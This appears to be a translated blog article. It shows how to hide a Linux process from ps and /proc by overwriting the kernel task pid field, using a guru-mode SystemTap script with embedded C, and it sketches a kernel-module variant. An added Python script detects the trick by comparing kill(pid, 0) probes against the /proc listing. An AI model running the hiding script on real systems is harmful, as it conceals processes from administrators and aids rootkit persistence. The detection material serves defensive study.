One line of code teaches you how to hide Linux processes

Friends always ask me how to hide a Linux process. I ask them how hidden they want it to be: hidden from the kernel, or merely hidden from users.

The discussions online all revolve around hooking procfs or similar user-mode tricks, and every one of them is lengthy. To me these approaches are far too big and too complicated. Someone who just wants to see a result quickly will probably be put off by such a pile of machinery.

This article introduces an unconventional method to hide Linux processes from users with just one line of code:

Just modify the pid field of the process.

Note that this is the minor kind of hiding (hiding from users, not from the kernel), so it is not worth countering. It is just a prank to play on a senior operations engineer for fun.

target->pid = 0x7fffffff;

The complete script is as follows:

#!/usr/bin/stap -g
# hide.stp -- must run in guru mode (-g) because of the embedded C below

global pid;

# Embedded C: look the task up by its pid number and overwrite the
# task_struct pid field with a value that procfs never registered.
function hide(who:long)
%{
 struct task_struct *target;

 target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
 target->pid = 0x7fffffff;
%}

# $1 is the first command-line argument: the pid to hide.
probe begin
{
 pid = $1;
 hide(pid);
 exit();
}

Come on, try it:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

You can use the following loop to list the binary behind every process that procfs still shows:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
 ls -l /proc/$pid/exe; 
done

If it is gone from procfs, ps will of course not be able to see it either.

If guru-mode stap feels too odd, you can write your own standalone Linux kernel module that makes the same modification and then simply bails out of its init function:

target->pid = xxxx;
return -1;

Isn't that much simpler than the various hook methods? This is what "change the data, not the code" means.

Let me briefly explain the principle.

  • When a task is created, its procfs directory entry is registered under its pid.
  • When procfs lists its directories, it walks the task list and uses each task's pid as the key to find the matching directory entry.
  • 0x7fffffff (or any other plausible value) was never registered, so nothing can be displayed for it.
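The flip side of that principle is the countermeasure. The task's pid field is what the procfs listing keys on, but the kernel's own pid table (the struct pid that find_vpid walks) is untouched, which is exactly why the script above can still find the task by number. A probe by number, kill(pid, 0), therefore still answers for a process that the /proc listing skips. The following script, added here as an example and not part of the original article, compares the two views in the classic "unhide" style; every function name in it is this example's own, not a kernel or article API.

```python
#!/usr/bin/env python3
"""Added example (not from the original article): report pids that the
kernel still resolves but that a readdir of /proc no longer lists.

Assumptions: Linux procfs at /proc, and that kill(pid, 0) consults the
kernel's pid table rather than the task_struct pid field the article
overwrites.  Helper names are this example's own.
"""
import errno
import os

PID_MAX_PATH = "/proc/sys/kernel/pid_max"


def listed_pids():
    """PIDs that a readdir of /proc reports (what ps and top see)."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def listed_tids(pids):
    """Thread ids of the listed processes, gathered from /proc/<pid>/task.

    kill(tid, 0) succeeds for threads too, but /proc only lists thread
    group leaders, so threads must be excluded or they look 'hidden'.
    """
    tids = set()
    for pid in pids:
        try:
            tids.update(int(t) for t in os.listdir(f"/proc/{pid}/task") if t.isdigit())
        except OSError:
            pass  # process exited meanwhile
    return tids


def pid_max():
    try:
        with open(PID_MAX_PATH) as f:
            return int(f.read())
    except OSError:
        return 32768  # conservative default for old kernels


def probe_pid(pid):
    """True if the kernel resolves this pid number to a task.

    Signal 0 is never delivered; the call only checks existence and
    permission.  EPERM means the task exists but is someone else's, so
    it counts as present.  ESRCH means no such task.
    """
    try:
        os.kill(pid, 0)
        return True
    except PermissionError:
        return True
    except ProcessLookupError:
        return False
    except OSError as e:
        return e.errno == errno.EPERM


def probed_pids(limit):
    return {pid for pid in range(1, limit + 1) if probe_pid(pid)}


def hidden_pids(listed_before, tids, probed, listed_after):
    """Pure set logic, kept separate so it can be unit-tested offline.

    A pid is suspicious only if the probe saw it, it is not a thread of
    a listed process, and neither /proc listing contained it.  The
    second listing filters out processes that were merely created
    between the first listing and the probe.
    """
    return probed - listed_before - tids - listed_after


def find_hidden():
    before = listed_pids()
    tids = listed_tids(before)
    probed = probed_pids(pid_max())
    after = listed_pids()
    return hidden_pids(before, tids, probed, after)


if __name__ == "__main__":
    suspects = find_hidden()
    for pid in sorted(suspects):
        # /proc/<pid> is often still reachable by direct lookup even when
        # readdir skips it, so try to name the binary as the article's
        # own loop does.
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = "?"
        print(f"pid {pid} answers kill(pid, 0) but is absent from the /proc listing: {exe}")
    if not suspects:
        print("no discrepancy between /proc listing and pid probe")
```

Run it as root so that kill(pid, 0) is not refused for other users' processes; a single suspect line pointing at an executable that ps cannot see is the signature of this trick. A short-lived process that starts and exits between the first listing and the probe can still produce a one-off false positive, so repeat the scan before acting on a result.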

No more words.

Once again, don't try to counter the methods described in this article, because something so simple is not worth countering, haha, right?

You can refer to my previous Rootkit series of articles to continue studying how Linux processes hide in the kernel. At the same time, I have given countermeasures for each method.

